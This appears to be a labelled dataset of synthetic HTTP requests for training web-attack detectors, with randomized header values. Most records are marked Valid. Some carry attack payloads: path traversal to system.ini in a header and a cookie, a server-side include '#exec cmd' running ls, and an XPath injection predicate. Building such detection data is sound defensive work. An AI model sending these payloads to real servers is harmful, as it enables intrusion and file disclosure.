Host: www.rlnda.it:1880
Connection: tiextin
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: itcnMn-eIqsOr, ordn-ax;q=0.0, eHde-hha
Cache-Control: Eyh=q
Client-ip: 184.38.170.151
Cookie: 3winput6xp_Samabin0=5paEnnpsaonce;n0mtieiae=ealhe>aoal;ssr5aemiohgeyc=Brhised0iIt4qhe
Cookie2: $Version="1"
Date: Tue, 02 Mar 04 18:36:56 GMT
ETag: "fce7_Rvgq32my2N"
Expect: 100-continue
From: ytshor@Dl5ho0zri.ch
If-Modified-Since: Thu, 22 Sep 05 10:39:47 GMT
If-Unmodified-Since: Fri, 29 Aug 08 12:40:56 UTC
If-Match: *
If-None-Match: "ImmSCzXq5GQR.WQ"
If-Range: *
Max-Forwards: 6142
MIME-Version: 1.9
Pragma: 9ndr2reu='1iy'
Proxy-Authorization: Basic aXRzaWU6ZGxlZA==
Authorization: es71 uzs9N=main
Range: -87767
Referer: /Dkoeitg/ndsw.jpg
TE: chunked,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/6.9 (X11; U; Solaris 4.2; ni-er; rv:0.2.9) Gecko/79838340
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 633x2304
Via: 7.1 145.222.190.69, HTTP/6.2 25.249.61.161, OisRn/1.2 40.124.80.139
Transfer-Encoding: gzip
Upgrade: T1aR/3.7
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 8782
Start - Id: 25548
class: Valid
GET /deirycqxio42kpncr6H/uURRIa/m4d/fD0sbS3nnwned/nBfM-Gw14Ow/su.htm?teihae=220&piUE=27850072&Letdtdyathwoe=NdfmJeolprocessing-instructionnr&ExMm=77472784&nUPMl0=oc&ecdSdE=tna8UozW&yigdmqaaei=cencat&ecoteBSuEys=a1drWosTo&mileT7olannil=1&ToolSl2ndit=Ujb&hxsyuO=qa1+&DoI=%40+ooxukznoiog%2Ffrom6&mebH0lionibea=rbf9t%7EemAmaWfeauh+aI&5sediSnstt=dgposition9w%3Ctand%25nnbinzhirvbscript&pnt=cF3gHWlN HTTP/1.0
Host: 118.40.180.180
Connection: 8esv
Accept: application/x-tar;q=0.9, application/rtf, image/png;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: a-hesiN;q=0.0, js5sykoI-el8;q=0.6, figaes-7j2g
Cache-Control: min-fresh=3
Client-ip: 22.166.212.236
Cookie: x9Pigjrpasswddy= ~;imiotoTEiean=tvautd;R8eeKto=p idh;dnnez=adMQOWiaU6;lwnenaal4bR=ceteja0sa;dspSvej=5938607
Cookie2: $Version="1"
Date: Fri, 02 May 08 09:50:49 UTC
ETag: "VRBKKGL52QsAU@f"
Expect: iorogo
From: iisl@HkElln.cz
If-Modified-Since: Fri, 09 Jun 06 10:38:09 UTC
If-Unmodified-Since: Mon, 15 Jun 09 14:31:03 UTC
If-Match: "l6vkGMmxx3b4jBE"
If-None-Match: *
If-Range: *
Max-Forwards: 0863
MIME-Version: 6.4
Pragma: feArs='aceoset'
Proxy-Authorization: ntlrt msoetln=heso
Authorization: she0tk Ctarti3o=uhrc
Range: 9-,-76849,526527-658
Referer: /ofsi4e/lHzxhoic/ohos/lseij8/yaiuxeeo.bin
TE: gzip
Trailer: Trailer
User-Agent: eRphagelrnauideeaup
UA-CPU: 68000
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8556x2731
Via: 7.7 179.77.115.154
Transfer-Encoding: gzip
Upgrade: Nu1w/8.6, l3aK/7.7
Warning: 142 222.56.226.72 "tngnIadabbtID" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25548
Start - Id: 13549
class: Valid
GET /eAdt2efEerse5eten/lnovLQyaa-BekzF/lGb/usraiGjt/u-81y./nrtSplib7lftNuzoa4r/ef/syeyrstjeg7i6sutWno.htm? HTTP/1.0
Host: www.nekuasp.st
Connection: keep-alive
Accept: video/mpeg;q=0.0, video/*;q=0.6
Accept-Charset: euc-jp, x-mac-arabic, iso-10646-ucs-2;q=0.2, iso-10646-ucs-2;q=0.1
Accept-Encoding: identity, gzip;q=0.1, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 82.35.59.17
Cookie: mxd1=ezPBKBvD
Cookie2: $Version="91"
Date: Wed, 04 Jun 08 15:57:04 UTC
ETag: W/"gQhz8jE0KLxYqpu"
Expect: 100-continue
From: ntyteei@sees9at.be
If-Modified-Since: Sat, 07 Jan 06 11:07:32 UTC
If-Unmodified-Since: Sat, 10 Mar 07 02:39:13 GMT
If-Match: "-Nr9nJnb610-ABz"
If-None-Match: *
If-Range: Wed, 13 Jun 07 20:38:13 UTC
Max-Forwards: 0
MIME-Version: 9.1
Pragma: mr='ilr'
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: NTLM aW9TWWVydGl1M3Rlbm5Rc2NlcnMwZXJRQmNsZ0VWbXVhbnRuc3VuSWFUZG8=
Range: 91-168
Referer: /hdElair/tsalcgF.cfm
TE: chunked;q=0.4,trailers
Trailer: Accept-Language
User-Agent: dOuuh/4.2.5
UA-CPU: x86
UA-Disp: 044,0737,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: HTTP/8.4 www.eujuoru.png
Transfer-Encoding: hsEeds
Upgrade: aon/3.5, vnn/6.0, TohiyS/5.0, sxhL/6.8
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13549
Start - Id: 6236
class: Valid
POST /LRW8SreplaceDtelnetk/syltta/E8eAoeHnOjpse/lCIE2Bwczt/emoDRQbr5iQ1v91tESYA/cth5ehSyudsp3/u.@ADxxivpUE8.php4? HTTP/1.1
Content-Length: 100
Content-Language: ece
Content-Encoding: compress
Content-Location: http://l6apra.ch/hs9x/hbuM/greaYa.png
Content-MD5: ZHMwbWRhZXN4Q2VyZHBoYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jul 05 06:16:40 GMT
Last-Modified: Tue, 31 Oct 06 23:58:36 GMT
Host: 209.25.220.103:61277
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ett-eiepdue;q=0.3, eee-m, zW-N;q=0.0, agqe-t0n;q=0.5, toso3ot-eanO
Cache-Control: max-stale=688
Client-ip: 143.6.232.80
Cookie: rsmfsemtqsxf8=rcn;etcaee0reront=t\sri ;UftpLlvyCm2Z=23;trrgut=torkl(dHtrcpurr;Ohpru= %re;oonwaoekulhin8n=02583
Cookie2: $Version="357"
Date: Wed, 24 Sep 08 21:41:18 CET
ETag: "Q5t7SYpePkVfCHI9"
Expect: e0pe=tqost;9ueae
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Mon, 26 Nov 07 03:20:52 GMT
If-Unmodified-Since: Thu, 09 Nov 06 15:40:54 UTC
If-Match: "a38qCm9zYt5Hpm2.PTvB"
If-None-Match: *
If-Range: Thu, 03 Aug 06 13:02:43 CET
Max-Forwards: 244
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbUFiaGVuclNqaW9vYmVXanQ0dHNkYWdpbGxqbnhlZ2FyZWVhUG1mbm1l
Authorization: Digest uri=http://teiaysam.biz/6gzo/har4tznr/oa7Teoee/ashSfbu.sh
Range: 08944-,040-34609
Referer: http://www.8pidsr.uk/tqpdEi/nsaeo8/gfeaihn/ee7zUg.conf
TE: trailers,chunked;q=0.1,trailers
Trailer: If-None-Match
User-Agent: om_EM6 http://www.Caswyea.biz
UA-CPU: 68000
UA-Disp: 8313,562,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 601x2459
Via: FTP/8.6 www.oo9t.tiff:04
Transfer-Encoding: deflate
Upgrade: eson/2.5, eaxeaa/8.7, hoaeOa/7.7, tgaWm/7.3
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 46703519834930865656
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zN54EfaPeiadmin=gOnhNtiloeqeg&FHnuZeir=nodejss a]eeauj&sue=0dt&xPscripthBo=5lWrxofs5eena&itlita=32

End - Id: 6236
Start - Id: 35966
class: PathTransversal
GET /w-Wk/oKxfLEdUs3EOM43n5B.js?S41i0T=81502&connectNF1dV6f0=%3A%5Dbpo%25wv7&C_oEx=lEtiednservicesr+et%7E&vOtijsam=ewaohifrl1oq&zNWI@vxpZ@=07&tCvTVallPbetween=7v&ct8aEavshe11e=iH6R&iyhe=1&augllQ84mfT=xoFhda93d4rc HTTP/1.0
Host: 235.223.131.144
Connection: close
Accept: video/mpeg, image/png, image/*
Accept-Encoding: ..\..\..\..\..\..\WINDOWS\system.ini
Accept-Language: *;q=0.3
Cache-Control: ad6oGte=ne4l
Date: Sat, 03 Jul 04 11:01:52 CET
Expect: 100-continue
From: teSMw1ts@vyPsooEwhr.de
Pragma: no-cache
Authorization: Basic ZDRIbXRvOnBlaWc=
Range: 87789-,80045-
Referer: /Vawesi/niu7e/7eac/vgaePEla/txiAh6p.asmx
User-Agent: rsuy (dDxxiC7A; nwlnKob; d9.bQoz)
UA-CPU: MIPS

null

End - Id: 35966
Start - Id: 18413
class: Valid
GET /d0vVDjZ3-559aZ6j/po/nt/hJflL26uS/9Sd/OjWSTVexecDAkAOmO/eNN/pntontsrprtop0wsjs.shtml?SzYtH5D=rnlgodlhzo%3En%2Fhceii&uehoowete8tp3=04393&comaOmnCrdnh=hHtrdiT45etf&AQbisnxhdti=hEy5Ls-Uac&NBcytnosiiEzoti=81845&hiOtuneedYe=82453406&dexhv=Ee2ii&fodwieeaasnao3h=-+%25+aec&QSee8raris=665&iam3Ussc=4833&Y3xXnznE0@k@=pbin HTTP/1.0
Host: 102.182.225.76:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-874, x-mac-ce;q=0.6, cp-932, iso-8859-8-i;q=0.7, iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 183.39.30.120
Cookie: sidtomrdricseme=am05pePpmSqn;nyaR5tp=li;s5nwBqczov9m=rhtaccesthdeleten9?r;o4nhyNhfssertv=ns7;tth=024722
Cookie2: $Version="693"
Date: Thu, 29 Jun 06 08:56:02 CET
ETag: W/"GD7QBP8tkY7nPwAAW"
Expect: eeic
From: 1hniea@u4rmt.it
If-Modified-Since: Sun, 15 Apr 07 15:14:51 UTC
If-Unmodified-Since: Thu, 05 Apr 07 05:22:57 UTC
If-Match: *
If-None-Match: *
If-Range: "Z87sXn.yxrThEZhW"
Max-Forwards: 128
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Basic NHJudzp0YUNiZQ==
Range: 0752-,8-,-9405
Referer: /Pshe.wmn
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 4.3; 4E-3d; rv:2.9.9) Gecko/69261823
UA-CPU: 68000
UA-Disp: 1388,0404,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 342x6218
Via: 7.3 225.218.64.138, HTTP/3.4 65.148.16.11:93750
Transfer-Encoding: deflate
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18413
Start - Id: 6257
class: Valid
PUT /qBm8Emkzi/te-RiHez/ngdao/tdzq/aO.2CN/tplcnGe/yv4AVVh1HDIm/bOn_SYFJ/sz7h23N.shtml? HTTP/1.0
Content-Length: 21
Content-Language: e8ntuL,oilw0ad,wrt2ia
Content-Encoding: deflate
Content-Location: http://dutgo3iW.uk/oripd.sh
Content-MD5: ZVNodHJ6aThlWTN5dWVzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 23:22:15 CET
Last-Modified: Wed, 11 Oct 06 22:13:34 CET
Host: www.jsyrldvhat.it
Connection: mtpaarr
Accept: application/*;q=0.5, application/*;q=0.5, audio/basic;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: zr7fn9x='E2naheAo'
Client-ip: 157.21.100.224
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="47"
Date: Thu, 09 Sep 04 21:27:19 CET
ETag: W/"lOSQGp7vOsjCtnp"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 29 Dec 07 04:08:38 GMT
If-Unmodified-Since: Sat, 21 Jan 06 19:42:35 UTC
If-Match: *
If-None-Match: *
If-Range: "38WOfpIo_UE@WT6-s0"
Max-Forwards: 83
MIME-Version: 1.5
Pragma: Ti=7d8AmnpM
Proxy-Authorization: NTLM emF3aWQ4ajNyd2FySXRtb3RzY2VPdGllaWNpYWFlemhvZjllcnBs
Authorization: 7fnwt eatlI=evAengaa
Range: 3-853722,-06527
Referer: /g8ro3/oerdj8rb/ymqf/2duel/cfwaw.exe
TE: gzip;q=0.2,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 1.3; nu-pe; rv:5.1.1) Gecko/02458085
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0276x3141
Via: FTP/8.4 www.yrsen.html, 5.4 www.k7taa.png, 3.7 www.audlaa.jpg:9
Transfer-Encoding: deflate
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 140 www.ner7.gif:28 "tvurexwIb0Sdxnss3ae" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

coatRyr=thaa&brDu=534

End - Id: 6257
Start - Id: 10238
class: Valid
GET /2evTpieeeLjrBrattrd/dJk/H2sH_UOz/tHMt/sjZllXesMyy2U7Qk/8ND/nf6iE0@etlfy/i3@v2.dll? HTTP/1.0
Host: 205.180.14.222:67
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.8, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ok='BaSe'
Client-ip: 242.45.255.170
Cookie: wt1e=840286073;nsue=Qs
Cookie2: $Version="7"
Date: Tue, 06 Jan 09 02:27:38 CET
ETag: "IpOAWUkT6We5EdxB@p"
Expect: 100-continue
From: 8ats@arc0sedxjc.net
If-Modified-Since: Mon, 11 Oct 04 05:33:43 UTC
If-Unmodified-Since: Mon, 30 Jul 07 23:55:41 GMT
If-Match: *
If-None-Match: "F88x.1pNrsZ1YSk"
If-Range: Tue, 03 Feb 09 03:09:33 GMT
Max-Forwards: 51
MIME-Version: 2.0
Pragma: aysP7h=eaeflbe
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: NTLM dDlicDJpdG5nZWZzN3JCZWVmenB0NG4zbmhBanNlaWNm
Range: 48806-,859-40,-983
Referer: http://www.ee9wisg.fr/fRn2eles/SdRaiju/4isaesk7/ahhbg/rgedssdi.ace
TE: chunked,gzip,deflate
Trailer: Via
User-Agent: Mozilla/9.0 (compatible; oabf; Open BSD i386; aatslfibq; esOLh5os; mc3a1e)
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x474
Via: 3.0 132.124.48.247, HTTP/9.6 www.aanswg.shtml:25752
Transfer-Encoding: identity
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 543 www.ocsh.htm "tc9yeg9eae" 
X-Forwarded-For: 143.110.205.106
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10238
Start - Id: 30755
class: Valid
GET /enmn9bat3h/NsU_9AIeINCx/a4nuscluerrhhi/qWIDVZbzL2yFch/t1UBotlho/nt/mHAOSROIciMU8vFrVT3.js?n4=57833271&oVqmse=Neoc&faNehhnoe=n0os0ltxJc0abu7 HTTP/1.0
Host: 166.33.36.253
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.8, windows-1253
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=54217
Client-ip: 28.45.221.90
Cookie: nltenaxd9e=vHG
Cookie2: $Version="4"
Date: Tue, 15 Jun 04 20:38:57 GMT
ETag: "kanm-t42aPExAOvvTB"
Expect: 100-continue
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Sat, 28 Feb 09 22:01:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 10:45:16 GMT
If-Match: "omYJURl_8pE9kU8yC"
If-None-Match: *
If-Range: "4wkw.k@cBKoAIRmB"
Max-Forwards: 8
MIME-Version: 6.1
Pragma: a='DeNtewo'
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: eAAo aYgn=t5m7ta
Range: -62284,291093-4,3-
Referer: http://reamdia.gov/9gmeaqp.cgi
TE: trailers,gzip,chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 8.2; st-ac; rv:8.2.3) Gecko/67666025
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 7.1 62.248.145.89, 9.5 96.30.31.202
Transfer-Encoding: weNi
Upgrade: ddel/0.0, wyuh/7.6, nhooa/2.0, sBsnr/5.0
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 14459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30755
Start - Id: 3869
class: Valid
PUT /xms/ea5tp9drileza19ecrpe/cdQiO_S1ny.html? HTTP/1.0
Content-Length: 204
Content-Language: st1er,tynisr,a
Content-Encoding: identity
Content-Location: /wlnh/bd4rsbxF/brhq/Syrc7in.bin
Content-MD5: b2ZzbWllOTFzbnRpcGFubw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 08:02:25 GMT
Last-Modified: Fri, 02 Oct 09 07:41:57 UTC
Host: www.cu0pxte.st
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.4, cp-950, iso-8859-9;q=0.6, macintosh;q=0.0, windows-1251;q=0.7
Accept-Encoding: deflate;q=0.6, compress, gzip
Accept-Language: T0O-e1auy;q=0.6, eeqd2e-eaesaqs;q=0.2, eaihva1n-toe
Cache-Control: no-transform
Client-ip: 154.215.255.197
Cookie: mnetcatRZ.L=136715791;anto=7winntl;uethus=702540;tnr=atlfiLscatocioW5m
Cookie2: $Version="47"
Date: Mon, 27 Mar 06 15:56:53 GMT
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Sat, 25 Apr 09 13:07:40 GMT
If-Unmodified-Since: Mon, 16 Jan 06 20:26:04 GMT
If-Match: "kqY4muIE5ZqwoM."
If-None-Match: *
If-Range: Sun, 28 Sep 08 06:19:39 GMT
Max-Forwards: 760
MIME-Version: 1.4
Pragma: lnane='aoes'
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: Digest response="34Be1EdD523CF64F66D05da1aeC5BF2a"
Range: 459294-700,2-,-859
Referer: http://www.SherTa.biz/e6yO.swf
TE: deflate;q=0.3,deflate,chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/6.4 (X11; U; Linux i586 9.2; ss-am; rv:4.2.4) Gecko/67520522
UA-Disp: 170,019,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2540x1804
Via: FTP/4.8 www.seh1TBRa.html
Transfer-Encoding: deflate
Upgrade: 1dd/5.6
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 25.247.174.254
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

zd4N=9_ITi&nw7bAaSwihK=hB4QYl&ae=215&efdRdsotblter=az]shutdownlsee&y3AF2g=r%u&kppxtermQdeleteHXVDz=w7TNIx7.zbb6&scriptMMgCE=eKF1rgFvTfl&6ipgeun=6129673&bmbine1n=systemta&9gfieoaIvl8n=l0an5Eartoaastost

End - Id: 3869
Start - Id: 15903
class: Valid
GET /e7qzOpdN/4etH1um/tnasbadaocHahiue/nt1xfehctwOnr/tF9y1C/ahn4lft.mdb?awrhhapEarna=httpsmaau%3D9%3Doten&63A8=awG8tz7Staflmoru&woieN3so1guh=4348747&pS=replace&nCtemeuhsenetW9=9563970&iWtihohOKGe0=h5SUCM&peedoeztnmosu=gllocationwgeteaiosac%2Fya&64tw=t+U&6ateYdN5hHsr=4554&ei6tnOeiaya=73 HTTP/1.1
Host: 115.199.117.21
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, deflate;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 12.135.89.242
Cookie: tZte=40;DFHd1Zo=f2Iv5UEgHg6j
Cookie2: $Version="8"
Date: Fri, 29 May 09 11:26:59 UTC
ETag: W/"bOVE-SfPCdzMAhNIJa"
Expect: bnwaa=srawoA
From: p3cchen@etaH.uk
If-Modified-Since: Fri, 02 Feb 07 19:12:06 GMT
If-Unmodified-Since: Sat, 09 Jun 07 14:02:59 UTC
If-Match: "SQN@son55PMqnQN"
If-None-Match: *
If-Range: "NZL-.u@I4xAaNWp"
Max-Forwards: 1829
MIME-Version: 2.1
Pragma: a=ehrsjele
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: Basic b2hubTplY2xxbHc=
Range: 24232-,-81,-37455
Referer: /s1eklos/tbic/rive/at7hdhas.avi
TE: trailers,trailers,gzip;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.2 (compatible; Konqueror/1.2; Win 9x; yriaonsee)
UA-CPU: x86
UA-Disp: 820,979,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 723x196
Via: HTTP/2.2 94.138.137.205, FTP/3.2 www.o0aosd.css, i7nu9/1.0 www.4lkerdow.shtml
Transfer-Encoding: identity
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 495532176106
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15903
Start - Id: 39956
class: SSI
GET /mtOyiK/aIyjaVU/ech7ea5reudssmq/eAgfev/Q-netcateWQUI/y9uM0aln61sl/d9IPozeLk@s3H/hatwecs/iwW_nKqCVFXt7ubfm/hYYSwbqJ8wbwVo8jl5On/hxN/RXA.D.js?0qDYnrhtaccesU8uC=%3C%21--+%23exec+++cmd%3D%22%2Fbin%2Fls+++++-l+++%2Fhome%2FphCearsxwi%2FpKg9nga%22++++--%3E&ih9fnu3e=scriptooo+ulnE%7C&hcsia8moqlDu=ictf21t&5oramrtes5wtn1=eqim%25xmlsn%7Ets&hrkmx=5196&deleteidHnvbscriptnca=t+s+t%5Cue%26ometat0u&eseo=0dsraoyPmrgxoz&havingEmZoK=s7+%3D HTTP/1.0
Host: www.odanoeons.cz
Connection: close
Accept: video/mpeg
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 225.57.174.238
Cookie: 1z9nUGllesBlnts=aZAaCsvR4SbK;uce2eelmei=window.openD;c8=ihlT'86wgetbd4 asswsry;sqqYlikeWL6t1i=a;sntafyY63rMhw=ttue
Cookie2: $Version="158"
Date: Wed, 24 Jun 09 11:41:30 UTC
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: so7e5@hesdawuna.uk
If-Modified-Since: Wed, 01 Jul 09 08:18:01 UTC
If-Unmodified-Since: Sat, 23 Apr 05 10:12:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Mar 06 16:37:59 CET
Max-Forwards: 8893
Pragma: no-cache
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: http://www.6taoior.gov/eetyneiq/tedq/o9gkf/neiWs.swf
TE: trailers
Trailer: Connection
User-Agent: icQE1U http://www.katanei.ch
UA-CPU: Sparc
UA-Color: color16
Via: FTP/8.0 www.yeawkaHs.shtml, 5.8 www.zIitmnNa.js
Transfer-Encoding: identity
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39956
Start - Id: 35846
class: XPathInjection
GET /uiqw/Rnwlqeono0g/tn84emauto/dDat/dnuit/xrsy/w4./caetjzf2bfUumuou9lef/evNAmnRM@FhTRPY/oisnynjnrhhnUoiHy/uJK8bVmlLC9uwkogyG_N.jsp?GSfidp7EcD=k%27s%25+&group byxp_B7usrb0Op=oaiins%3C++fe&ilw4om5raioumfa=geh1t%2FaHhseR%2Fzhld%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D644%5D+++++or++++%27t0NdtCs%27+++%3D+++%27&TOopt0y2KG_Hs4=sqp-x.&wettsDzd04a=nxotdocumentce&6lZCXFcKsRnode=cl1wusnaiYgfaeCn HTTP/1.1
Host: www.sespslse.de:8759
Connection: keep-alive
Accept: audio/*, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity, identity;q=0.8, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 177.161.53.181
Cookie: es7eith=nt;LoybmU2=975517;ctfti=eahl|cerq1cna]
Cookie2: $Version="398"
Date: Wed, 17 Mar 04 19:56:40 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: sc2nG
From: wcsotyes@fnolepci.st
If-Modified-Since: Tue, 03 Aug 04 02:08:22 GMT
If-Unmodified-Since: Thu, 10 Jan 08 07:21:19 GMT
If-Match: *
If-None-Match: "X_CIH3d7trktcA3.r7"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Basic MmM5bERoOm50eTZtZ2Uw
Range: 77-,-9
Referer: /aebi/aTw1/mias.mspx
TE: gzip,gzip
Trailer: Authorization
User-Agent: Mozilla/2.3 (compatible; 5tatnafn9i; Unix; huknans; ApCntlt; iuoroadu)
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: 7.5 www.aid3rrs.jpg, unuse/9.8 www.yvnsDhjy.gif, FTP/6.3 175.87.111.111
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35846
Start - Id: 46000
class: PathTransversal
PUT /r7mMIJt6.gif? HTTP/1.1
Content-Length: 192
Content-Language: epp,iidsrus,tixanao
Content-Encoding: compress
Content-Location: http://www.zXu4nyl.uk/nEywraLt/gePwre.js
Content-MD5: cnRudFlzMXR5RHdlZW9paw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Sep 06 06:14:23 GMT
Last-Modified: Sat, 25 Mar 06 06:26:27 GMT
Host: 78.253.44.92
Connection: close
Accept: video/mpeg, video/*;q=0.4, image/png
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.5
Cache-Control: max-age=522
Client-ip: 43.254.7.157
Cookie: vbscripte9H_19f73=..\..\..\..\WINNT\system.ini
Date: Fri, 09 Sep 05 24:11:42 GMT
ETag: W/"7Whex7ksVyEN-qcJHL"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Tue, 09 Aug 05 16:35:11 GMT
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: *
If-Range: "5o0N3A8NwOjws6dj-r"
Max-Forwards: 812
MIME-Version: 8.3
Pragma: l='iOunetl'
